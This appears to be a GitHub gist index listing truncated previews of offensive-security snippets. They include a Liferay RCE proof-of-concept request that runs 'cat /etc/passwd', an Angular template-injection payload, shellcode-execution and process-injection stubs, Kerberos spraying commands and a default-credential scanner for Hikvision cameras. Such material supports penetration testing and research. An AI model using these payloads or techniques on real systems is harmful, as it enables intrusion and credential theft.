Skip to content

Instantly share code, notes, and snippets.

View ashr's full-sized avatar

ashr ashr

View GitHub Profile
ashr /
Created August 12, 2021 16:08 — forked from micahvandeusen/ modified to use EfsRpcDecryptFileSrv not EfsRpcOpenFileRaw
#!/usr/bin/env python
# Author: GILLES Lionel aka topotam (@topotam77)
# Modified by: Micah Van Deusen (@micahvandeusen)
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs)
# "Most of" the code stolen from from @3xocyte ;)
import sys
import argparse
ashr / LiferayRCE(CVE-2020-7961).md
Created February 5, 2021 06:15 — forked from pikpikcu/LiferayRCE(CVE-2020-7961).md
POC Liferay RCE(CVE-2020-7961)
View LiferayRCE(CVE-2020-7961).md
POST /api/jsonws/invoke HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

ashr / Program.cs
Created January 25, 2021 14:33
Generate a CSV containing ParentObject and SPN name from BloodHound export of GetAllSPNS Query
View Program.cs
using System;
using System.IO;
using System.Linq;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
namespace spns
class Program
View CreateRemoteThreadDInvoke.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace InjectionTest
public class DELEGATES
ashr /
Created May 11, 2020 09:08 — forked from TarlogicSecurity/
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet



python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

ashr / EtwpTest.cs
Created May 8, 2020 08:40 — forked from TheWover/EtwpTest.cs
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
View EtwpTest.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
class Program
static void Main(string[] args)
ashr /
Created April 29, 2020 10:54
GhostLoader - AppDomainManager - Injection - 攻壳机动队

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
ashr /
Created April 20, 2020 12:42 — forked from mccabe615/
Angular Template Injection Payloads

1.3.2 and below


'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
ashr /
Created February 12, 2020 04:17 — forked from smidgedy/
This abomination pulls Hikvision NVR/DVR systems out of masscan output JSON, checks them for default creds, and dumps still images from any system it can access to aid identification. Runs faster if you have GNU Parallel. This is what happens when you start a project as a bash one-liner because opening vscode is too much effort.
# Masscan - common ports are 80, 81, 8000, 8080, 8081, 8090, 8888, 9000, 9001
# I do it like this:
# sudo masscan --banners --source-ip <IP not in use on your network> --rate <how fast you can scan>\
# -iL <list of CIDR to scan> -p <that list of ports above> -oJ <output file.json>
# Output filenames
ashr / AllIdoIsWin.cs
Created January 15, 2020 09:24
Stolen from twitter, think it was posted by Casey Smith (@subTee)
View AllIdoIsWin.cs
<Project xmlns="">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
<UsingTask TaskName="SimpleTask" AssemblyFile="AllIDoIsWinWinWin.dll" />